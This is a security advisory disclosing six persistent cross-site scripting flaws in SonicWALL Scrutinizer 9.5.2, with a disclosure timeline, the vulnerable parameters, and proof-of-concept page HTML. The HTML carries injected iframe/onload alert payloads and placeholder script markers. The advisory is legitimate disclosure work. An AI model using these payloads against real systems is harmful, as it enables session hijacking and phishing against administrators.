Sonicwall OEM Scrutinizer v9.5.2 - Multiple Vulnerabilities




Common Vulnerability Scoring System:

Dell™ SonicWALL™ Scrutinizer is a multi-vendor, flow-based application traffic 
analytics, visualization and reporting tool 
to measure and troubleshoot network performance and utilization while 
increasing productivity for enterprises and service providers. 
Scrutinizer supports a wide range of routers, switches, firewalls, and 
data-flow reporting protocols, providing unparalleled insight 
into application traffic analysis from IPFIX/NetFlow data exported by Dell 
SonicWALL firewalls, as well as support for a wide range 
of routers, switches, firewalls, and data-flow reporting protocols. IT 
administrators in charge of high throughput networks can 
deploy Scrutinizer as a virtual appliance for high performance environments. 

(Copy of the Vendor Homepage: 
http://www.sonicwall.com/us/en/products/Scrutinizer.html )

The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the Dell Sonicwall OEM Scrutinizer v9.5.2 appliance 

2012-12-05:     Researcher Notification & Coordination
2012-12-07:     Vendor Notification
2013-01-08:     Vendor Response/Feedback
2013-02-10:     Vendor Fix/Patch
2013-02-11:     Public or Non-Public Disclosure


Affected Products:
Product: Sonicwall OEM Scrutinizer 9.5.2



Multiple persistent input validation vulnerabilities are detected in the 
Sonicwall OEM Scrutinizer v9.5.2 appliance application.
The bugs allows remote attackers to implement/inject malicious script code on 
the application side (persistent).

The first persistent vulnerability is located in the Alarm - New Board & Policy 
Manager module with the bound vulnerable 
Search item - BBSearchText parameter request. The vulnerability allows to 
inject persistent script code as search item value.
The result is the persistent execution of script code out of the BBSearchText 

The secound persistent vulnerability is located in the Dashboard - Flow Expert 
module with the bound vulnerable Mytab parameter.
The vulnerability allows to inject persistent script code as myTab link value. 
The result is the persistent execution of script 
code out of the Mytab link listing.

The 3rd persistent vulnerability is located in the MyView (CGI) module with the 
bound vulnerable `newName` parameter request.
The vulnerability allows to inject persistent script code as newName. The 
result is the persistent execution of script code 
out of the core value listing.

The 4th persistent vulnerability is located in the Admin > Admin [New Users & 
New Group] module with the bound vulnerable 
groupName & username parameters. The vulnerability allows to inject persistent 
script code as username or groupname. The result 
is the persistent execution of script code out of all username and group 
listings + checkboxes.

The 5th persistent vulnerability is located in the Admin > Admin [Mapping / 
Maps (CGI) - Dashboard Status] module with the bound 
vulnerable groupMembers, Type, Checkbox Linklike, indexColumn, name, Object 
Name & settings groups(checkbox) parameters. 
The vulnerability allows to inject persistent script code as groupMembers, 
Type, Checkbox Linklike, indexColumn, name, Object Name 
& settings groups(checkbox) value(s). The result is the persistent execution of 
script code out of the groupMembers, Type, Checkbox 
Linklike, indexColumn, name, Object Name listings and settings groups checkbox.

The 6th persistent vulnerability is located in the Alarms > Overview Bulletin 
Board > Advanced Filters module with the bound vulnerable 
displayBBAdvFilterModal() - (Policy Name, Board Name, Violators) parameters. 
The vulnerability allows to inject persistent script code 
as Policy Name, Board Name and Violator. The result is the persistent execution 
of script code out of the Policy Name, Board Name and 
Violator listings.

Successful exploitation of the vulnerability can lead to persistent session 
hijacking (manager/admin), persistent phishing, persistent 
external redirects to malware or scam and persistent web context manipulation 
in the affected vulnerable module(s). Exploitation requires 
low user interaction & a low privileged appliance web application user account.

Vulnerable Section(s):
                        [+] Alarm
                        [+] Dashboard
                        [+] MyView (CGI)
                        [+] Admin > Admin
                        [+] Admin > Admin 
                        [+] Alarms

Vulnerable Module(s):
                        [+] New Board & Policy Manager
                        [+] Flow Expert
                        [+] Value
                        [+] New Users & New Group
                        [+] Mapping / Maps (CGI) - Dashboard Status
                        [+] Overview Bulletin Board > Advanced Filters

Vulnerable Parameter(s):
                        [+] Search item - BBSearchText
                        [+] Mytab
                        [+] newName
                        [+] groupName & username - Place in Usergroup - Listing
                        [+] groupMembers, Type, Checkbox Linklike, indexColumn, 
name, Object Name & settings groups(checkbox)
                        [+] displayBBAdvFilterModal() - (Policy Name, Board 
Name, Violators)

Proof of Concept:
The persistent input validation web vulnerabilities can be exploited by remote 
attackers with low privileged application user account 
and low required user interaction. For demonstration or reproduce ...

Review: Alarm > New Board & Policy Manager - [BBSearchText]  Search item

<td class="textRight agNoWrap">
<input id="BBSearchText" title="Search item" value="<<[PERSISTENT INJECTED 
SCRIPT CODE!];)" <="""=""></iframe>
<input class="button" id="BBSearchButton" value="Search" title="Search" 
onclick="bbSearch(this)" type="button">

<input class="button" onclick="displayBBAdvFilterModal()" title="Search using 
multiple criteria" value="Advanced Filters" type="button">

Review: Dashboard > Flow Expert > Mytab - [Mytab Name]

<div><span class="myv_tab"><span tid="1" style="margin-left: 10px; 
margin-right: 10px;">Flow Expert</span></span>
<span class="myv_tab"><span tid="2" style="margin-left: 10px; margin-right: 
10px;">Configure Flow Analytics</span></span>
<span class="myv_tab"><span tid="3" style="margin-left: 10px; margin-right: 
10px;">CrossCheck</span></span><span class="myv_tab">
<span tid="4" style="margin-left: 10px; margin-right: 
10px;">Example</span></span><span class="myv_tab"><span tid="5" 
10px; margin-right: 10px;">Cisco PfR</span></span><span class="myv_tab"><span 
tid="6" style="margin-left: 10px; margin-right: 
10px;">Training</span></span><span class="myv_selectedtab"><span title="Click 
to rename" class="jedit" id="tab_7" 
CODE!]">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span>
<img style="margin-left: 6px; cursor: pointer;" 
<span style="margin-left: 6px; cursor: pointer;">Add a tab</span></span></div>

Review: MyView (CGI) > Value - [newName]

<meta http-equiv="content-type" content="text/html; charset=UTF-8"></head>
INJECTED SCRIPT CODE!]") <"}</iframe></body>

Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & 
username - Place in Usergroup - Listing]

<div class="unfortunate" style="" id="settingsContent">
<div id="settingsHeader"></div>

<div id="settingsOutput">

<title>User Preferences</title>
<div id="mainFrame">

<div style="height: 552px;" id="upMenu"><div class="basic ui-accordion 
selected" style="float:left;" id="upTreeMenu">
<a class="selected"> New User</a><div style="height: 511px; display: block; 
overflow: hidden;" class="genericAccordionContainer">
<p style="padding-left: 10px;" id="new_user_panel"><label>Username: <input 
class="newform" id="new_username" 
type="text"></label><label>Password <input class="newform" id="new_password" 
type="password"><img id="pw_strength" 
src="/images/common/strength_0.gif"></label><label>Confirm Password: <input 
class="newform" id="cnf_password" type="password">
</label><label style="margin-top: 5px; margin-bottom: 8px;" 
id="up_availGroupsLbl">Place in User Group <select style="display: block;" 
id="up_availGroups"><option value="3"><iframe src="a">    "><[PERSISTENT 
INJECTED SCRIPT CODE!]") <</iframe></option>
<option value="1">Administrators</option><option 
 value="Create User" class="button" 
style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a><div 
style="height: 511px; display: none; overflow: hidden;" 
class="genericAccordionContainer"><p id="users_p"><span 

Review: Admin > Admin > Mapping/Maps (CGI) - Dashboard Status - [groupMembers, 
Type, Checkbox Linklike, indexColumn,name,ObjectName & settings groups]

<div class="fmapsScroll" id="groupScroll"><table class="dataTable filterable" 
id="grpTable"><tbody id="grpTbody"><tr id="grpTblHdr">
<th width="20"><input id="checkAllObj" name="checkAllObj" title="Permanently 
delete groups" type="checkbox"></th><th style="width: 100%;" 
class="alignLeft">Group Name</th><th width="40">Type</th><th 
width="40">Membership</th><th width="40">Map Status</th></tr><tr id="grp_tr1">
<td><input title="Permanently delete this object from ALL groups" name="1" 
type="checkbox"></td><td class="alignLeft"><a title="Click here to edit 
this group" href="#NA" class="linkLike"><iframe src="a">%20%20%20%20[PERSISTENT 
INJECTED SCRIPT CODE!]"><ifra...</iframe></a>
</td><td>Google</td><td><a title="Click to change object 
membership for this group" class="linkLike">Membership</a></td><td><select 
id="pass_1" class="passSel"><option value="0">No Pass</option>
<option value="1">Pass Up</option></select></td>
<td style="display: none;" class="indexColumn">%20%20%20%20[PERSISTENT INJECTED 
SCRIPT CODE!]"><ifra...googlemembershipno 
passpass up</td></tr></tbody></table></div><input style="margin-top: 10px; 
margin-left: 8px;" id="delObjectBtn" value="Delete" class="button" 
type="button"><div id="editGrpDiv"><div id="obj_typeForm"><div 
id="iconPreview"><img src="/images/maps/group16.png" id="previewImage"></div>
<div id="toGroupMsg"></div><select style="margin-left: 30px; margin-bottom: 
5px; width: 159px;" id="obj_iconSelect" name="icon"><option 
<option value="gicon48.png">gicon48.png</option><option 
<option value="group24.png">group24.png</option><option 
<option value="group72.png">group72.png</option></select></div><table 
id="editGroupTable" class="dataTable"><tbody><tr id="grpTypeRow">
<td class="alignLeft cellHeader">Type</td><td class="alignLeft"><select 
id="edit_grpType"><option value="flash">Flash</option>


<table class="dataTable" id="fmaps_mapTabList" 
style="white-space: nowrap;" nowrap="">Map</th>
<th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: 
nowrap;" nowrap="">Background</th></tr></thead><tbody>
<tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" 
nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20">
<iframe src=a onload=alert("VL") <</iframe></a></td><td class="" 
style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td>
&#8203;&#8203;&#8203;&#8203;&#8203;<td class="" 


<tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" 
name="checkAllObj" type="checkbox"></th><th width="20"> 
</th>&#8203;&#8203;&#8203;&#8203;&#8203;<th style="width: 100%;" 
tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: 
center;" align="center" nowrap="">
Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td 
class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi 
highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td 
class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit 
this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe 
src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap="">
<span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi 
highlightRow"><a title="Click to change group membership for this object" 
style="display: none;" class="indexColumn fmaps_bakTrHi 
highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody>


<td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" 
id="fmaps_confBody" valign="top"><div style="height: 19px;" 
class="titleBar">&#8203;&#8203;&#8203;&#8203;&#8203;<span style="float:left" 
;="">Settings</span><img title="Map Settings Help" 
src="/images/common/help.png"><select id="fmaps_groupSelect">
<option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a 
onload=alert("VL") < (google)
id="fmaps_confBodyContainer"><div id="defaultsContainer">


<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea 
expandable-hitarea "> </div> &#8203;&#8203;&#8203;&#8203;&#8203;<img 
gid="1" title="<iframe 
src=a>%20%20%20%20">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe src="a" 
onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe>
<span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe 
src=a onload=alert("VL") < (Group ID: 1)" 
gid="1"><iframe src="a">%20%20%20...</span>

<ul style="display: none;">

<li class='expandable noWrapOver lastExpandable'> 
<div class='hitarea expandable-hitarea lastExpandable-hitarea'> </div> <img 
src='/images/common/TreeUngroupGray.png'/><span class="">Ungrouped</span>
                        <ul style="display: none;">
<li class="last"><span class=" ">No Devices</span></li>

2013-02-10:     Vendor Fix/Patch

Where changing code paths to use bound variables was not practical in such a 
short timeframe, we pass inputs included in a query through a function that 
escapes potentially dangerous characters.

The security risk of the persistent input validation web vulnerabilities are 
estimated as medium(+)|(-)high.

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 

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                                        Copyright © 2012 | Vulnerability 

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